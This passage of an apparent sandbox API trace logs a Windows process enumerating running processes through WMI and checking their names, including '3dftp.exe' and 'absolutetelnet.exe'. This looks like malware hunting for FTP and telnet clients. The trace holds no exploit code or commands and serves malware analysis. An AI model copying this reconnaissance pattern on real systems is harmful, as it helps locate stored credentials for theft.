wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.337] IWbemClassObject:Get (in: This=0x5703e78, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.337] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"") returned 0x66 [0279.337] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"") returned 0x66 [0279.337] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.337] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.338] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.338] IUnknown:Release (This=0x500344) returned 0x1 [0279.338] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc1f8) returned 0x0 [0279.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc1f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.339] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc1f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702510) returned 0x0 [0279.339] WbemDefPath:IUnknown:Release (This=0x56fc1f8) returned 0x0 [0279.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702510) returned 0x0 [0279.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.339] WbemDefPath:IUnknown:AddRef (This=0x5702510) returned 0x3 [0279.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc208) returned 0x0 [0279.339] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc208, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.340] WbemDefPath:IUnknown:Release (This=0x56fc208) returned 0x3 [0279.340] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.340] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.340] WbemDefPath:IUnknown:Release (This=0x5702510) returned 0x2 [0279.340] WbemDefPath:IUnknown:Release (This=0x5702510) returned 0x1 [0279.340] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.340] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702510, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702510) returned 0x0 [0279.340] WbemDefPath:IUnknown:AddRef (This=0x5702510) returned 0x3 [0279.340] WbemDefPath:IUnknown:Release (This=0x5702510) returned 0x2 [0279.340] WbemDefPath:IWbemPath:SetText (This=0x5702510, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"") returned 0x0 [0279.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.340] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.340] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.340] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.340] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.340] IWbemClassObject:Get (in: This=0x5703e78, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c7634*=0, plFlavor=0x27c7638*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x27c7634*=8, plFlavor=0x27c7638*=0) returned 0x0 [0279.340] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0279.340] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0279.341] IWbemClassObject:Get (in: This=0x5703e78, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c7634*=8, plFlavor=0x27c7638*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x27c7634*=8, plFlavor=0x27c7638*=0) returned 0x0 [0279.341] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0279.341] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0279.341] CoTaskMemAlloc (cb=0x4) returned 0x56fc238 [0279.341] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc238, puReturned=0x27bb39c | out: apObjects=0x56fc238*=0x5704010, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.342] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704010) returned 0x0 [0279.342] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.342] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.342] IUnknown:AddRef (This=0x5704010) returned 0x3 [0279.342] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.342] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.342] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5704014) returned 0x0 [0279.343] IMarshal:GetUnmarshalClass (in: This=0x5704014, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.343] IUnknown:Release (This=0x5704014) returned 0x3 [0279.343] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.343] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.343] IUnknown:QueryInterface (in: This=0x5704010, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.343] IUnknown:Release (This=0x5704010) returned 0x2 [0279.343] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.343] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.343] IUnknown:QueryInterface (in: This=0x5704010, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704010) returned 0x0 [0279.343] IUnknown:AddRef (This=0x5704010) returned 0x4 [0279.343] IUnknown:Release (This=0x5704010) returned 0x3 [0279.343] IUnknown:Release (This=0x5704010) returned 0x2 [0279.343] CoTaskMemFree (pv=0x56fc238) [0279.343] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.343] IUnknown:AddRef (This=0x5704010) returned 0x3 [0279.343] IWbemClassObject:Get (in: This=0x5704010, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.344] IWbemClassObject:Get (in: This=0x5704010, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.344] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"") returned 0x66 [0279.344] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"") returned 0x66 [0279.344] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.344] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.344] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.344] IUnknown:Release (This=0x500344) returned 0x1 [0279.345] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc238) returned 0x0 [0279.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc238, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.345] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc238, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57025f0) returned 0x0 [0279.345] WbemDefPath:IUnknown:Release (This=0x56fc238) returned 0x0 [0279.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57025f0) returned 0x0 [0279.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.346] WbemDefPath:IUnknown:AddRef (This=0x57025f0) returned 0x3 [0279.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc248) returned 0x0 [0279.346] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc248, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.346] WbemDefPath:IUnknown:Release (This=0x56fc248) returned 0x3 [0279.346] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.346] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.346] WbemDefPath:IUnknown:Release (This=0x57025f0) returned 0x2 [0279.346] WbemDefPath:IUnknown:Release (This=0x57025f0) returned 0x1 [0279.346] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.346] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x57025f0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57025f0) returned 0x0 [0279.346] WbemDefPath:IUnknown:AddRef (This=0x57025f0) returned 0x3 [0279.346] WbemDefPath:IUnknown:Release (This=0x57025f0) returned 0x2 [0279.346] WbemDefPath:IWbemPath:SetText (This=0x57025f0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"") returned 0x0 [0279.347] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.347] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.347] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.347] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.347] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.347] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.347] IWbemClassObject:Get (in: This=0x5704010, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c7e98*=0, plFlavor=0x27c7e9c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x27c7e98*=8, plFlavor=0x27c7e9c*=0) returned 0x0 [0279.347] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0279.347] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0279.347] IWbemClassObject:Get (in: This=0x5704010, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c7e98*=8, plFlavor=0x27c7e9c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x27c7e98*=8, plFlavor=0x27c7e9c*=0) returned 0x0 [0279.347] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0279.347] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0279.347] CoTaskMemAlloc (cb=0x4) returned 0x56fc278 [0279.347] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc278, puReturned=0x27bb39c | out: apObjects=0x56fc278*=0x57041a8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.348] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57041a8) returned 0x0 [0279.348] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.348] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.349] IUnknown:AddRef (This=0x57041a8) returned 0x3 [0279.349] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.349] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.349] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57041ac) returned 0x0 [0279.349] IMarshal:GetUnmarshalClass (in: This=0x57041ac, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.349] IUnknown:Release (This=0x57041ac) returned 0x3 [0279.349] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.349] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.349] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.349] IUnknown:Release (This=0x57041a8) returned 0x2 [0279.349] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.349] CoGetContextToken (in: pToken=0x43e354 | out: 